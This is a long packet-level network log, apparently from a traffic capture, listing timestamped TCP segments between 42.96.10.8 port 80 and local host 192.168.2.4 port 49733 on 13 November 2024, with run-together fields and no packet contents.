                                                                                                                                                                                                            Nov 13, 2024 13:25:22.488022089 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.488039017 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.488054037 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.488066912 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.488070965 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.488089085 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.488101006 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.488105059 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.488136053 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.488178015 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.488204956 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.488219976 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.488219976 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.488238096 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.488253117 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.488253117 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.488270998 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.488286018 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.488286972 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.488302946 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.488317013 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.488320112 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.488337040 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.488349915 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.488352060 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.488368034 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.488383055 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.488394976 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.488409996 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.488423109 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.488437891 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.488451004 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.488455057 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.488457918 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.488471985 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.488487959 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.488500118 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.488526106 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.524271011 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.524287939 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.524305105 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.524331093 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.524333000 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.524347067 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.524363041 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.524378061 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.524382114 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.524395943 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.524741888 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.524787903 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.524874926 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.524930954 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.524946928 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.524966955 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.525001049 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.525017977 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.525034904 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.525037050 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.525052071 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.525067091 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.525089025 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.525104046 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.525120974 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.525136948 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.525151014 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.525154114 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.525168896 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.525182962 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.525230885 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.525264978 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.525290012 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.525305033 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.525305986 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.525324106 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.525338888 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.525352955 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.525356054 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.525372028 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.525383949 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.525389910 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.525402069 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.525405884 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.525444031 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.554724932 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.554739952 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.554765940 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.554780960 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.554792881 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.554797888 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.554814100 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.554827929 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.554858923 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.554873943 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.554877996 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.554892063 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.554917097 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.554933071 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.554939032 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.554948092 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.554961920 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.554964066 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.554980993 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.554994106 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.555027962 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.555088043 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.555104017 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.555119991 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.555135965 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.555150986 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.555162907 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.555166006 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.555185080 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.555206060 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.555206060 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.555217028 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.555232048 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.555247068 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.555263042 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.555265903 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.555277109 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.555294991 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.555318117 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.581598043 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.581617117 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.581644058 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.581655979 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.581659079 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.581675053 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.581690073 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.581692934 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.581707001 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.581721067 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.581726074 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.581729889 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.581746101 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.581760883 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.581795931 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.583762884 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.584002972 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.584017992 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.584033966 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.584047079 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.584049940 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.584065914 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.584069967 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.584083080 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.584098101 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.584099054 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.584140062 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.590101004 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.590116978 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.590132952 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.590152025 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.590166092 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.590192080 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.590195894 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.590213060 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.590292931 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.590307951 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.590312958 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.590325117 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.590341091 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.590347052 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.590384007 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.590421915 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.590437889 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.590452909 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.590467930 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.590482950 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.590483904 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.590498924 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.590509892 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.590514898 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.590531111 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.590539932 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.590573072 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.590589046 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.590605974 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.590610027 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.590622902 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.590635061 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.590639114 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.590656042 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.590670109 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.590699911 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.590718031 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.590733051 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.590748072 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.590763092 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.590764046 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.590780973 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.590794086 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.590797901 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.590847015 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.590853930 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.590869904 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.590884924 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.590905905 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.590910912 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.590926886 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.590941906 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.590943098 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.590959072 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.590972900 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.590976954 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.590990067 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.591005087 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.591017962 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.591022015 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.591037035 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.591041088 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.591100931 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.591152906 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.591170073 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.591183901 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.591203928 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.591213942 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.591228962 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.591243029 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.591258049 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.591263056 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.591296911 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.591310978 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.591346025 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.591361046 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.591361046 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.591377974 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.591397047 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.591402054 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.591418028 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.591434002 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.591439962 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.591450930 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.591465950 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.591474056 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.591490984 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.591506004 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.591521978 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.591536045 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.591537952 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.591550112 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.591566086 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.591578007 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.591582060 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.591598988 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.591614008 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.591614962 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.591630936 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.591645956 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.591661930 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.591680050 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.591686964 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.591701984 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.591717958 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.591732979 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.591753960 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.591777086 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.591815948 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.591833115 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.591847897 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.591862917 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.591877937 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.591882944 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.591895103 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.591907024 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.591911077 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.591927052 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.591928959 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.591943026 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.591973066 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.591995001 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.592010975 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.592025042 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.592040062 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.592042923 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.592066050 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.592120886 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.592137098 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.592150927 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.592164993 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.592168093 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.592185020 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.592186928 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.592201948 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.592216015 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.592219114 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.592232943 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.592257023 CET804973342.96.10.8192.168.2.4
